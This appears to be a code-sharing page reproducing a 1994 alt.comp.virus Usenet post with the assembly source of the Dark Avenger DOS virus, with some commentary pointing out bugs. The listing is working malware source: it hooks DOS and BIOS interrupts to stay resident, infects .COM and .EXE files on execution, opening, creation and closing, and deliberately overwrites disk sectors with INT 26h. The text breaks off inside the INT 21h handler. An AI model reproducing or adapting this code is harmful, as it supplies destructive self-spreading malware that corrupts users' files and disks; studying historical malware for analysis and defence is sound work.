📄 darkav.asm
字号:
From netcom.com!ix.netcom.com!netnews Tue Nov 29 09:44:15 1994Xref: netcom.com alt.comp.virus:509Path: netcom.com!ix.netcom.com!netnewsFrom: Zeppelin@ix.netcom.com (Mr. G)Newsgroups: alt.comp.virusSubject: Dark Avenger VirusDate: 29 Nov 1994 13:13:46 GMTOrganization: NetcomLines: 1018Distribution: worldMessage-ID: <3bf9ea$iep@ixnews1.ix.netcom.com>References: <sbringerD00yHv.Hs3@netcom.com> <bradleymD011vJ.Lp8@netcom.com>NNTP-Posting-Host: ix-pas2-10.ix.netcom.com DARK AVENGER VIRUScode segment assume cs:code,ds:codecopyright: db 'Eddie lives...somewhere in time!',0date_stamp: dd 12239000hchecksum: db 30 ; Return the control to an .EXE file:; Restores DS=ES=PSP, loads SS:SP and CS:IP. exit_exe: mov bx,es add bx,10h add bx,word ptr cs:[si+call_adr+2] mov word ptr cs:[si+patch+2],bx mov bx,word ptr cs:[si+call_adr] mov word ptr cs:[si+patch],bx mov bx,es add bx,10h add bx,word ptr cs:[si+stack_pointer+2] mov ss,bx mov sp,word ptr cs:[si+stack_pointer] db 0eah ;JMP XXXX:YYYYpatch: dd 0 ; Returns control to a .COM file:; Restores the first 3 bytes in the; beginning of the file, loads SP and IP. exit_com: mov di,100h add si,offset my_save movsb movsw mov sp,ds:[6] ;This is incorrect xor bx,bx push bx jmp [si-11] ;si+call_adr-top_file ; Program entry point startup: call relativerelative: pop si ;SI = $ sub si,offset relative cld cmp word ptr cs:[si+my_save],5a4dh je exe_ok cli mov sp,si ;A separate stack is supported for add sp,offset top_file+100h ;the .COM files, in order not to sti ;overlap the stack by the program cmp sp,ds:[6] jnc exit_comexe_ok: push ax push es push si push ds mov di,si ; Looking for the address of INT 13h handler in ROM-BIOS xor ax,ax push ax mov ds,ax les ax,ds:[13h*4] mov word ptr cs:[si+fdisk],ax mov word ptr cs:[si+fdisk+2],es mov word ptr cs:[si+disk],ax mov word ptr cs:[si+disk+2],es mov ax,ds:[40h*4+2] ;The INT 13h vector is moved to INT 40h cmp ax,0f000h ;for diskettes if a hard disk is jne nofdisk ;available mov word ptr cs:[si+disk+2],ax mov ax,ds:[40h*4] mov word ptr cs:[si+disk],ax mov dl,80h mov ax,ds:[41h*4+2] ;INT 41h usually points the segment, cmp ax,0f000h ;where the original INT 13h vector is je isfdisk cmp ah,0c8h jc nofdisk cmp ah,0f4h jnc nofdisk test al,7fh jnz nofdisk mov ds,ax cmp ds:[0],0aa55h jne nofdisk mov dl,ds:[2]isfdisk: mov ds,ax xor dh,dh mov cl,9 shl dx,cl mov cx,dx xor si,sifindvect: lodsw ;Occasionally begins with: cmp ax,0fa80h ; CMP DL,80h jne altchk ; JNC somewhere lodsw cmp ax,7380h je intchk jne nxt0altchk: cmp ax,0c2f6h ;or with: jne nxt ; TEST DL,80h lodsw ; JNZ somewhere cmp ax,7580h jne nxt0intchk: inc si ;then there is: lodsw ; INT 40h cmp ax,40cdh je found sub si,3nxt0: dec si dec sinxt: dec si loop findvect jmp short nofdiskfound: sub si,7 mov word ptr cs:[di+fdisk],si mov word ptr cs:[di+fdisk+2],dsnofdisk: mov si,di pop ds ; Check whether the program is present in memory: les ax,ds:[21h*4] mov word ptr cs:[si+save_int_21],ax mov word ptr cs:[si+save_int_21+2],es push cs pop ds cmp ax,offset int_21 jne bad_func xor di,di mov cx,offset my_sizescan_func: lodsb scasb jne bad_func loop scan_func pop es jmp go_program ; Move the program to the top of memory:; (it's full of rubbish and bugs here) bad_func: pop es mov ah,49h int 21h mov bx,0ffffh mov ah,48h int 21h sub bx,(top_bz+my_bz+1ch-1)/16+2 jc go_program mov cx,es stc adc cx,bx mov ah,4ah int 21h mov bx,(offset top_bz+offset my_bz+1ch-1)/16+1 stc sbb es:[2],bx push es mov es,cx mov ah,4ah int 21h mov ax,es dec ax mov ds,ax mov word ptr ds:[1],8 call mul_16 mov bx,ax mov cx,dx pop ds mov ax,ds call mul_16 add ax,ds:[6] adc dx,0 sub ax,bx sbb dx,cx jc mem_ok sub ds:[6],ax ;Reduction of the segment sizemem_ok: pop si push si push ds push cs xor di,di mov ds,di lds ax,ds:[27h*4] mov word ptr cs:[si+save_int_27],ax mov word ptr cs:[si+save_int_27+2],ds pop ds mov cx,offset aux_size rep movsb xor ax,ax mov ds,ax mov ds:[21h*4],offset int_21;Intercept INT 21h and INT 27h mov ds:[21h*4+2],es mov ds:[27h*4],offset int_27 mov ds:[27h*4+2],es mov word ptr es:[filehndl],ax pop esgo_program: pop si ; Smash the next disk sector: xor ax,ax mov ds,ax mov ax,ds:[13h*4] mov word ptr cs:[si+save_int_13],ax mov ax,ds:[13h*4+2] mov word ptr cs:[si+save_int_13+2],ax mov ds:[13h*4],offset int_13 add ds:[13h*4],si mov ds:[13h*4+2],cs pop ds push ds push si mov bx,si lds ax,ds:[2ah] xor si,si mov dx,siscan_envir: ;Fetch program's name lodsw ;(with DOS 2.x it doesn't work anyway) dec si test ax,ax jnz scan_envir add si,3 lodsb ; The following instruction is a complete nonsense. Try to enter a drive &; directory path in lowercase, then run an infected program from there.; As a result of an error here + an error in DOS the next sector is not; smashed. Two memory bytes are smashed instead, most probably onto the; infected program. sub al,'A' mov cx,1 push cs pop ds add bx,offset int_27 push ax push bx push cx int 25h pop ax pop cx pop bx inc byte ptr [bx+0ah] and byte ptr [bx+0ah],0fh ;It seems that 15 times doing jnz store_sec ;nothing is not enough for some. mov al,[bx+10h] xor ah,ah mul word ptr [bx+16h] add ax,[bx+0eh] push ax mov ax,[bx+11h] mov dx,32 mul dx div word ptr [bx+0bh] pop dx add dx,ax mov ax,[bx+8] add ax,40h cmp ax,[bx+13h] jc store_new inc ax and ax,3fh add ax,dx cmp ax,[bx+13h] jnc small_diskstore_new: mov [bx+8],axstore_sec: pop ax xor dx,dx push ax push bx push cx int 26h ; The writing trough this interrupt is not the smartest thing, bacause it; can be intercepted (what Vesselin Bontchev has managed to notice). pop ax pop cx pop bx pop ax cmp byte ptr [bx+0ah],0 jne not_now mov dx,[bx+8] pop bx push bx int 26hsmall_disk: pop axnot_now: pop si xor ax,ax mov ds,ax mov ax,word ptr cs:[si+save_int_13] mov ds:[13h*4],ax mov ax,word ptr cs:[si+save_int_13+2] mov ds:[13h*4+2],ax pop ds pop ax cmp word ptr cs:[si+my_save],5a4dh jne go_exit_com jmp exit_exego_exit_com: jmp exit_comint_24: mov al,3 ;This instruction seems unnecessary iret ; INT 27h handler (this is necessary) int_27: pushf call alloc popf jmp dword ptr cs:[save_int_27] ; During the DOS functions Set & Get Vector it seems that the virus has not; intercepted them (this is a doubtfull advantage and it is a possible; source of errors with some "intelligent" programs) set_int_27: mov word ptr cs:[save_int_27],dx mov word ptr cs:[save_int_27+2],ds popf iretset_int_21: mov word ptr cs:[save_int_21],dx mov word ptr cs:[save_int_21+2],ds popf iretget_int_27: les bx,dword ptr cs:[save_int_27] popf iretget_int_21: les bx,dword ptr cs:[save_int_21] popf iret exec: call do_file call alloc popf jmp dword ptr cs:[save_int_21] db 'Diana P.',0 ; INT 21h handler. Infects files during execution, copying, browsing or; creating and some other operations. The execution of functions 0 and 26h; has bad consequences. int_21: push bp mov bp,sp push [bp+6] popf pop bp pushf call ontop cmp ax,2521h je set_int_21 cmp ax,2527h je set_int_27 cmp ax,3521h je get_int_21 cmp ax,3527h je get_int_27 cld cmp ax,4b00h je exec cmp ah,3ch je create cmp ah,3eh je close cmp ah,5bh jne not_createcreate: cmp word ptr cs:[filehndl],0;May be 0 if the file is open jne dont_touch call see_name jnz dont_touch call alloc popf call function jc int_exit pushf push es push cs pop es push si push di push cx push ax mov di,offset filehndl stosw mov si,dx mov cx,65move_name: lodsb stosb test al,al jz all_ok loop move_name mov word ptr es:[filehndl],cxall_ok: pop ax pop cx pop di pop si pop esgo_exit: popf jnc int_exit ;JMPclose: cmp bx,word ptr cs:[filehndl] jne dont_touch test bx,bx jz dont_touch call alloc popf call function jc int_exit pushf push ds push cs pop ds push dx mov dx,offset filehndl+2 call do_file mov word ptr cs:[filehndl],0 pop dx pop ds jmp go_exitnot_create: cmp ah,3dh je touch cmp ah,43h je touch cmp ah,56h ;Unfortunately, the command inter- jne dont_touch ;preter does not use this functiontouch: call see_name jnz dont_touch call do_filedont_touch: call alloc popf call functionint_exit: pushf push ds call get_chain mov byte ptr ds:[0],'Z'⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -